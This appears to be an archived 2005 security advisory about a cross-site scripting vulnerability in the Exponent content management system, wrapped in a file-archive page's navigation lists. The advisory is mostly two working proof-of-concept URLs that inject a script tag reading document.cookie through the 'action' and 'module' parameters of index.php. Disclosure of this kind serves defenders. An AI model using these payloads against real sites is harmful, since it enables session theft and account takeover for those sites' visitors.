exponentXSS.txt

exponentXSS.txt: Posted Jul 2, 2005; Authored by RB9; Exponent suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 17391fe57e89c0f09aec93ab7a628fa3f9c6bcbc7581b85c7cf6198214ca4bfd; Download | Favorite | View

exponentXSS.txt

 Exponent is an open source content management system designed
primarily for non-technical types. Its website is at
http://www.exponentcms.org/


Exponent suffers from a Cross Site scripting (XSS) vulnerability;

http://[host]/[folder]/index.php?module=newsmodule&src=@random41940a897e943∫=&
action=<script>alert(document.cookie)</script>

http://[host]/[folder]/index.php?module=<script>
alert(document.cookie)</script>&src=@random41940a897e943∫=&action=



FNSE advisory
http://fnse.be.tt

Watch out for my new book "How to Make Unhackable French Fries"

RB9

Top Authors In Last 30 Days

Red Hat 290 files
Ubuntu 63 files
Debian 20 files
Gentoo 8 files
Apple 6 files
LiquidWorm 4 files
Google Security Research 4 files
Alter Prime 3 files
Spencer McIntyre 3 files
Jann Horn 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

exponentXSS.txt

exponentXSS.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

exponentXSS.txt

Share This

exponentXSS.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems